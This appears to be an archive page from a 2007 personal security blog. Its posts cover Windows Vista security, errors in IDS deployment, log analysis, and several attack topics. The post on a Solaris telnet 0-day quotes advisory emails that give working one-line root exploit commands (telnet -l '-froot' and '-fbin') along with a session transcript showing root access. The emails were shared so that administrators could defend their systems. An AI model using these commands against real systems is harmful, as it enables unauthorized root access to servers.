Wednesday, February 28, 2007

Windows Vista Security

Hi all,
I know too many people talk about Windows Vista security. Many security researchers and security professionals still talking about security innovations and features in Windows Vista such as User Account Protection, BitLocker Drive Encryption and EFS, Windows Defender, Windows Firewall, Windows Security Center, Internet Explorer 7, and much more.

You can read about Windows Vista research by Symantec Security Response in order to provide a balanced and objective analysis of these improvements. You can read pdf paper about Security Implication of Windows Vista and blog about Vista Security.

You also can read slide presentation about Windows Vista Security Explained presented by Paul Thurrott, News Editor from Windows IT Pro Magazines.

Saturday, February 24, 2007

Avoid these five common IDS implementation errors

Intrusion Detection Systems can go a long way to keep hackers from penetrating your network. However, they can only work if you properly set them up. Here are five common errors and how you can avoid them:
  • Ignoring frequent false positives
  • Avoiding IPSec to support NIDS
  • Monitoring only inbound connections
  • Using shared network resources to gather NIDS data
  • Trusting IDS analysis to non-expert analysts
You can read full article:
http://articles.techrepublic.com.com/5100-6350-5785230.html

Thursday, February 22, 2007

Cracking Windows Vista Passwords

This article is about cracking Windows Vista passwords using Ophcrack and Cain. You can read full article here:
http://irongeek.com/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cain

I cannot test it because i don't have Windows Vista. I think i will try it later...hehehe

Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning , I received email from Dshiled about Solaris Telnet 0-day. The article about this issue:
https://isc.sans.org/diary.html?storyid=2220

You also can read this email:
Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console",
don't
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start
kicking...

Email 3:
HD is not 100% accurate. It can be -froot if and only if you have
commented the CONSOLE setting within /etc/default/login . This
setting prevents network logons to root account and is set by
default. However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions. Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

If you try userids with non standard shells such as /bin/false or
one similar to the one in the jass package will also kick the end
user out. Users that have been locked (passwd -l userid ) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.
Scott


That's why i don't like to use Solaris......hehehehe....

Broken Authentication and Session Security

This is an article about Broken Authentication and Session Security. I think this article can be used by penetration tester who want to test user identities, passwords or session mechanisms.
You can refer to full article:
http://www.hackerscenter.com/archive/view.asp?id=27269

Friday, February 02, 2007

'Contact Us' attack takes out mail servers?

The "contact us" feature on many websites is often insecure and makes it easy to launch denial of service attacks on corporate mail servers, according to UK-based security consultancy SecureTest. They said 'Contact Us' forms can be used to launch denial of service attacks through endemic security weaknesses that have largely been overlooked. You can read here.

Five Mistakes of Security Log Analysis

In DoD Cybercrime Conference 2007 in St. Louis, Missouri, Anton Chuvakin gave a talk about the "Five Mistakes of Security Log Analysis". Anton talks about operational security challenges that organizations face while deploying log and alert collection and analysis infrastructure. You can refer here for his simple presentation.
You also can refer to his previous article for Computerworld. I think this article is useful for us. Chuvaking highlights the top five most common mistakes organizations make in this process:
1: Not looking at the logs
2: Storing logs for too short a time
3: Not normalizing logs
4: Failing to prioritize log records
5: Looking for only the bad stuff

p/s: I think NSM is one of the solution for this five mistakes to reduce problems for my IDS that i'm still using it......hehehhee....